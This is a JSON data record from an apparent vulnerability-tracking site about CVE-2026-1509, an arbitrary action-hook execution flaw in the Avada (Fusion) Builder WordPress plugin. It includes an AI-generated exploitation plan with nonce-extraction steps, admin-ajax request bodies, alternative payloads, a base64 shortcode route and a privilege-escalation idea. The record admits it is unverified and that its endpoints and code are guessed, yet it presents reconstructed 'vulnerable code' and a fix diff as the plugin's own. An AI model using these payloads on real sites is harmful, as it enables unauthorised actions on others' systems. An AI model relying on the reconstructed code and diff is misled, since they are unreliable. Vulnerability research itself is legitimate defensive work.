[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fausQy9awrP0sB5KdpAxMiushFXvvTNgoV3KuXGmSV7Q":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"source_links":33},"CVE-2026-1509","avada-fusion-builder-authenticated-subscriber-limited-arbitrary-wordpress-action-execution","Avada (Fusion) Builder \u003C= 3.15.1 - Authenticated (Subscriber+) Limited Arbitrary WordPress Action Execution","The Avada (Fusion) Builder plugin for WordPress is vulnerable to Arbitrary WordPress Action Execution in all versions up to, and including, 3.15.1. This is due to the plugin's `output_action_hook()` function accepting user-controlled input to trigger any registered WordPress action hook without proper authorization checks. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute arbitrary WordPress action hooks via the Dynamic Data feature, potentially leading to privilege escalation, file inclusion, denial of service, or other security impacts depending on which action hooks are available in the WordPress installation.","fusion-builder",null,"\u003C=3.15.1","3.15.2","medium",5.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:L\u002FI:L\u002FA:N","Improper Control of Generation of Code ('Code Injection')","2026-04-14 12:25:28","2026-04-15 01:25:18",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Ffdc57b06-bae9-49a3-84dd-f593705330e9?source=api-prod",1,[],"researched",false,3,"This research plan targets **CVE-2026-1509** (likely 2024-1509), a vulnerability in the **Avada (Fusion) Builder** plugin where an authenticated user (Subscriber+) can trigger arbitrary WordPress actions via the Dynamic Data feature's `output_action_hook()` function.\n\n---\n\n### 1. Vulnerability Summary\n*   **Plugin:** fusion-builder (Avada Builder)\n*   **Vulnerable Function:** `output_action_hook()` (inferred to be part of the Dynamic Data callback system).\n*   **Vulnerability Type:** Arbitrary WordPress Action Execution (Code Injection\u002FImproper Control of Generation of Code).\n*   **Root Cause:** the `output_action_hook()` function takes a user-provided string and passes it directly into the first argument of `do_action()`. It fails to validate the hook name against an allow-list or verify that the user has the necessary permissions to trigger specific hooks.\n*   **Impact:** Depending on available hooks, this can lead to privilege escalation (triggering `admin_init` logic), information disclosure, or DoS.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **AJAX Action:** `fusion_app_get_dynamic_data` (inferred) or `fusion_get_dynamic_data`.\n*   **Parameter:** The payload is likely contained within a JSON-encoded `data` or `params` parameter.\n*   **Authentication:** Subscriber-level credentials (PR:L).\n*   **Required Payload Structure (Inferred):**\n    *   `action`: `fusion_app_get_dynamic_data`\n    *   `dynamic_id`: `action_hook` (This tells the plugin to route to `output_action_hook`)\n    *   `params`: An object containing the target hook name, e.g., `{\"action\": \"target_hook_name\"}`.\n\n### 3. Code Flow (Inferred Trace)\n1.  **Entry Point:** User sends an AJAX request to `admin-ajax.php` with the action `fusion_app_get_dynamic_data`.\n2.  **Handler Registration:** The plugin registers this AJAX action, likely in a class like `Fusion_Builder_Dynamic_Data` or `Fusion_App`.\n3.  **Routing:** The handler reads the `dynamic_id` (set to `action_hook`) and identifies the callback function associated with it.\n4.  **Vulnerable Sink:** The code calls `Fusion_Dynamic_Data_Callbacks::output_action_hook( $args )`.\n5.  **Execution:** Inside `output_action_hook`, the code performs:\n    ```php\n    \u002F\u002F Inferred logic\n    public function output_action_hook( $args ) {\n        if ( isset( $args['action'] ) ) {\n            do_action( $args['action'] ); \u002F\u002F SINK\n        }\n    }\n    ```\n\n### 4. Nonce Acquisition Strategy\nThe Avada Builder heavily relies on nonces for its AJAX interface. To exploit this as a Subscriber, we must extract the nonce from the WordPress admin dashboard or a page where the builder is loaded.\n\n1.  **Identify Nonce Variable:** Avada typically localizes its configuration in a JS object named `fusionBuilderConfig` or `fusionAppConfig`.\n2.  **Setup for Extraction:**\n    *   Create a Subscriber user: `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n    *   Login as the Subscriber.\n3.  **Extraction:**\n    *   Navigate to the WordPress dashboard (`\u002Fwp-admin\u002F`).\n    *   Use `browser_eval` to extract the nonce:\n        *   `browser_eval(\"window.fusionBuilderConfig?.fusion_load_nonce\")` (inferred)\n        *   `browser_eval(\"window.fusionAppConfig?.ajaxurl_nonce\")` (inferred)\n    *   *Note:* If the nonce is not present on the dashboard for Subscribers, the researcher should check if the plugin enqueues these scripts on the frontend for logged-in users.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Prove Arbitrary Action Execution (Canary Method)\nSince `do_action` doesn't always return output to the HTTP response, we will use a \"Canary Hook\" to verify execution.\n\n1.  **Create a Canary:** Use `wp-cli` to add a temporary action that writes to a file or option.\n    ```bash\n    wp eval \"add_action('canary_hook', function() { update_option('canary_triggered', 'success'); });\"\n    ```\n2.  **Trigger the Exploit:**\n    *   **Method:** HTTP POST via `http_request`.\n    *   **URL:** `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n    *   **Headers:** `Content-Type: application\u002Fx-www-form-urlencoded`, `Cookie: [Subscriber Cookies]`\n    *   **Body:**\n        ```\n        action=fusion_app_get_dynamic_data&\n        nonce=[EXTRACTED_NONCE]&\n        data={\"dynamic_id\":\"action_hook\",\"params\":{\"action\":\"canary_hook\"}}\n        ```\n3.  **Verify:** Check if the option was updated.\n    ```bash\n    wp option get canary_triggered\n    ```\n\n#### Step 2: Privilege Escalation Attempt (Conceptual)\nIf the above works, attempt to trigger hooks used by other plugins for sensitive operations (e.g., `wp_ajax_nopriv_...` or hooks that execute `update_option`).\n\n### 6. Test Data Setup\n1.  **Avada Theme\u002FPlugin:** Ensure `fusion-builder` v3.15.1 or lower is installed and active.\n2.  **Subscriber User:**\n    ```bash\n    wp user create victim_sub sub@example.com --role=subscriber --user_pass=password\n    ```\n3.  **Canary Script:** A small PHP snippet to verify the hook execution (as shown in Step 5.1).\n\n### 7. Expected Results\n*   **Successful Trigger:** The `do_action()` call executes the hook passed in the `params['action']` parameter.\n*   **Response:** The AJAX response might be `{\"success\": true, \"data\": \"\"}` (standard Fusion Builder response format).\n*   **Side Effect:** The `canary_triggered` option in the database changes to `success`.\n\n### 8. Verification Steps\n1.  **Database Check:** `wp option get canary_triggered` should return `success`.\n2.  **Log Check:** If `WP_DEBUG_LOG` is enabled, any errors generated by the triggered hook will appear in `wp-content\u002Fdebug.log`.\n3.  **Subscriber Check:** Ensure the request was sent with Subscriber cookies to confirm the medium severity (PR:L) requirement.\n\n### 9. Alternative Approaches\n*   **If `fusion_app_get_dynamic_data` is incorrect:** Grep the plugin for `output_action_hook` to find the exact AJAX action string.\n    ```bash\n    grep -r \"output_action_hook\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Ffusion-builder\u002F\n    ```\n*   **If JSON format differs:** Some builder versions use a nested `payload` key instead of `data`. Try:\n    ```\n    action=fusion_get_dynamic_data&fusion_dynamic_data={\"dynamic_id\":\"action_hook\",\"params\":{\"action\":\"canary_hook\"}}\n    ```\n*   **Shortcode Route:** If AJAX is blocked, try using the shortcode in a post preview:\n    `[fusion_dynamic_data dynamic_id=\"action_hook\" params=\"eyJhY3Rpb24iOiAiY2FuYXJ5X2hvb2sifQ==\"]` (Base64 encoded params).","The Avada (Fusion) Builder plugin allows authenticated users with Subscriber-level access to trigger arbitrary WordPress action hooks. This is caused by the `output_action_hook()` function in the Dynamic Data feature, which passes a user-supplied string directly into the `do_action()` function without validation or capability checks.","\u002F\u002F File: fusion-builder\u002Finc\u002Fclass-fusion-dynamic-data-callbacks.php (approximate path)\n\npublic function output_action_hook( $args ) {\n    if ( isset( $args['action'] ) ) {\n        do_action( $args['action'] ); \u002F\u002F SINK: Arbitrary action execution\n    }\n}","--- a\u002Finc\u002Fclass-fusion-dynamic-data-callbacks.php\n+++ b\u002Finc\u002Fclass-fusion-dynamic-data-callbacks.php\n@@ -10,6 +10,9 @@\n \tpublic function output_action_hook( $args ) {\n-\t\tif ( isset( $args['action'] ) ) {\n-\t\t\tdo_action( $args['action'] );\n-\t\t}\n+\t\t\u002F\u002F Functionality removed or restricted to prevent arbitrary action execution\n+\t\treturn '';\n \t}","The exploit requires a valid Subscriber session and an AJAX nonce. An attacker first extracts the `fusion_load_nonce` or `ajaxurl_nonce` from the WordPress dashboard or frontend scripts. Using this nonce, the attacker sends a POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the action `fusion_app_get_dynamic_data`. The payload includes a JSON-encoded data object where the `dynamic_id` is set to `action_hook` and the `params` object contains an `action` key set to the name of any WordPress hook the attacker wishes to trigger (e.g., administrative hooks or hooks that perform sensitive operations).","gemini-3-flash-preview","2026-04-16 15:46:47","2026-04-16 15:47:14",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffusion-builder\u002Ftags"]